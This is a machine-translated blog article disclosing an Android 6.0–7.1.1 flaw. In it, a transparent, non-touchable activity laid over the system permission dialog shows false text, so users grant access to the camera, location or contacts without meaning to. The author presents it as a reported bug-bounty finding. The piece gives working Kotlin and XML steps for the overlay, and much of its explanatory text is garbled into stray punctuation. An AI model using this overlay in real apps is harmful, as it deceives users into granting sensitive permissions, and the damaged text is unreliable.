Clever Geek Handbook

Changing Runtime Permissions in Android

Hello, my name is Vitaly.





I am 25 years old, I graduated from the St. Petersburg State Electrotechnical University "LETI" in my hometown. I've been programming for 10 years, of which 4 I've been writing for Android. The author of many Homebrew programs, known as VITTACH, for the Sony PlayStation Portable (PSP) .





Today I would like to discuss with you the problem of mobile application security. Developers at Google are constantly improving Android, finding and fixing vulnerabilities with the help of a large community gathered thanks to the Android Security Rewards program , which we will talk about later. Nevertheless, problems still remain, and it is our common task as a community to report them so that they are corrected in a timely manner.





Vulnerability of which I speak, belongs to the class with the Priority: the P2 and the Severity: the S2 , that according to the table in a broad sense, means:





  • A problem that needs to be resolved within a reasonable time frame;





  • An issue that is important to a large percentage of users and is related to core functionality.





Runtime permission

The article will focus on such a thing known to all developers as Runtime permission, namely, the possibility of misleading the end user by demonstrating the permission dialog box with its own text and icon over the system one. It is easy to guess that such an approach would allow developers to ask the user for permission, say, to the file system, and in fact - to give access to geolocation, camera, or something else.





It's impossible

A similar question has been asked more than once on specialized forums, in particular on StackOverflow . The only correct answer was that it was impossible. And this is really so: it is impossible to replace the text in the system dialog itself, but it is possible to override it with your own.





What's under the hood

Runtime Permission Android 6.0



dangerous-. , . dangerous .





Dangerous permissions

  • android.permission_group.CALENDAR





    • android.permission.READ_CALENDAR





    • android.permission.WRITE_CALENDAR





  • android.permission_group.CAMERA





    • android.permission.CAMERA





  • android.permission_group.CONTACTS





    • android.permission.READ_CONTACTS





    • android.permission.WRITE_CONTACTS





    • android.permission.GET_ACCOUNTS





  • android.permission_group.LOCATION





    • android.permission.ACCESSFINELOCATION





    • android.permission.ACCESSCOARSELOCATION





  • android.permission_group.MICROPHONE





    • android.permission.RECORD_AUDIO





  • android.permission_group.PHONE





    • android.permission.READPHONESTATE





    • android.permission.CALL_PHONE





    • android.permission.READCALLLOG





    • android.permission.WRITECALLLOG





    • android.permission.ADD_VOICEMAIL





    • android.permission.USE_SIP





    • android.permission.PROCESSOUTGOINGCALLS





  • android.permission_group.SENSORS





    • android.permission.BODY_SENSORS





  • android.permission_group.SMS





    • android.permission.SEND_SMS





    • android.permission.RECEIVE_SMS





    • android.permission.READ_SMS





    • android.permission.RECEIVEWAPPUSH





    • android.permission.RECEIVE_MMS





    • android.permission.READCELLBROADCASTS





  • android.permission_group.STORAGE





    • android.permission.READEXTERNALSTORAGE





    • android.permission.WRITEEXTERNALSTORAGE









Android GrantPermissionsActivity, .





ActivityCompat.requestPermissions(
    MainActivity.this,
    arrayOf(Manifest.permission.READ_CONTACTS),
    PERMISSION_REQUEST_CODE
)

Activity, UI , Activity, .





:





Activity android:windowIsTranslucent=true



( Activity , , ) Activity , . Activity Activity .





– Activity , – Activity . Activity, ?





, , , , . , :





Activity , onResume



onPause



. Activity.





, Activity , . – !





,

Kotlin









  • , 





    <style name="Theme.Transparent" parent="AppTheme">
<item name="android:windowBackground">@android:color/transparent</item>
<item name="android:windowIsTranslucent">true</item>
</style>

  • Activity 





    ...
<activity android:name=".PermissionActivity"
          android:theme="@style/Theme.Transparent">

  • PermissionActivity layout





    onCreate :





    window.addFlags(
  FLAG_NOT_FOCUSABLE or FLAG_NOT_TOUCH_MODAL or FLAG_NOT_TOUCHABLE
)

    :





    • FLAG_NOT_FOCUSABLE



      : window, FLAG_NOT_FOCUSABLE



      , ;





    • FLAG_NOT_TOUCH_MODAL



      : , , , ;





    • FLAG_NOT_TOUCHABLE



      : .





  • MainActivity 





    ActivityCompat.requestPermissions(
    MainActivity.this,
    arrayOf(Manifest.permission.READ_CONTACTS),
    REQUEST_CODE
)

  • MainActivity : PermissionActivity. 





    startActivity(Intent(this, PermissionActivity::class.java))

    PermissionActivity Activity . !





Android >= 7.1.1

Runtime Permission Android 6.0



, 7.1.1



, .. Android



.





Android 6.0



, . , Google .





Android Rewards Program

I submitted an application and attached all explanatory and demonstration documents related to this vulnerability. At the moment, the application is under consideration, so I cannot divulge the details, because I have signed the corresponding agreement.





How is it easier?

For the convenience of exploiting the vulnerability, I wrote a library



















More articles:


All Articles